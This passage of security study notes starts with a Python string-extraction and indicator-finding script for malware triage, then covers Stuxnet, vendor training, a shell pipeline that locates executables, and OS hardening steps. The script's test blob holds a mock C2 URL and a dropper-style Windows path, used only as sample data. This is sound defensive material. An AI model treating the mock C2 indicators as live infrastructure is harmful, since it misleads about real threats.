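URL = re.compile(r"https?://[^\s\"'<>]+")
WIN_PATH = re.compile(r"[A-Za-z]:\\[^\s\"'<>]+")

# Constructed blob: an ELF-like ident, an interpreter path, a C2 URL, a UTF-16LE
# Windows path, a bare IP, an invalid IP and a too-short string.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/lib64/ld-linux-x86-64.so.2\x00" + b"\x01\x02\x03"
    + b"http://203.0.113.45:8080/gate.php\x00" + b"\xff\xfe"
    + "C:\\Users\\Public\\svc.exe".encode("utf-16-le") + b"\x00\x00" + b"\x90" * 4
    + b"198.51.100.23\x00" + b"999.1.1.1\x00" + b"ab\x00"
)


def extract_strings(data: bytes, min_len: int = 4) -> dict:
    """Return printable ASCII runs and UTF-16LE runs of at least min_len characters."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return {
        "ascii": [m.group().decode("ascii") for m in ascii_run.finditer(data)],
        "utf16": [m.group().decode("utf-16-le") for m in utf16_run.finditer(data)],
    }


def _add_unique(bucket: list, item: str) -> None:
    if item not in bucket:
        bucket.append(item)


def find_indicators(strings: list) -> dict:
    """Pick IPv4 addresses, URLs and Windows paths out of extracted strings, in order of appearance."""
    found = {"ipv4": [], "url": [], "windows_path": []}
    for s in strings:
        for cand in IPV4.findall(s):
            try:
                ip_address(cand)           # rejects octets > 255
            except ValueError:
                continue
            _add_unique(found["ipv4"], cand)
        for u in URL.findall(s):
            _add_unique(found["url"], u)
        for p in WIN_PATH.findall(s):
            _add_unique(found["windows_path"], p)
    return found


if __name__ == "__main__":
    s = extract_strings(SAMPLE_BLOB)
    for kind, items in find_indicators(s["ascii"] + s["utf16"]).items():
        print(f"{kind}: {items}")
```

Packed or encrypted malware yields few meaningful strings; a binary whose only readable strings are section names and a loader stub is itself a finding, and the unpacked strings have to be recovered from memory during dynamic analysis.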

Stuxnet

This worm, widely attributed to the United States and Israel, targeted the Siemens industrial control systems (Step 7 software and S7 programmable logic controllers) that ran Iran's uranium-enrichment centrifuges. It spread through Windows hosts, reprogrammed the PLCs to drive the centrifuges at damaging speeds, and fed recorded normal readings back to the monitoring systems so that operators would not detect it.

Vendor

Vendors may provide demo copies of hardware or software. They also may offer free training. These are considered free to moderately expensive ways of self-study.

Finding Executables

find / -type f -executable -print0 2>/dev/null |
while IFS= read -r -d '' f; do
    file -i "$f" | grep -iE 'application/x-(pie-)?executable; charset=binary'
done

For every file found, run the file command and print only the ones whose MIME type is an executable. The -print0 / read -d '' pairing keeps file names with spaces intact, and the 2>/dev/null drops permission errors. Modern distributions build position-independent executables, which file reports as application/x-pie-executable rather than application/x-executable, so the pattern must accept both or it will miss most binaries on the system.

OS Defenses

- Deploying change detection and integrity checking software and maintaining logs
- Deploying or enabling change detection and integrity checking software on all servers
- Ensuring that operating systems are consistent and have been patched with the latest updates from vendors
- Ensuring that only trusted sources are used when installing and upgrading OS code
- Disabling unnecessary OS services and processes that may pose a security vulnerability

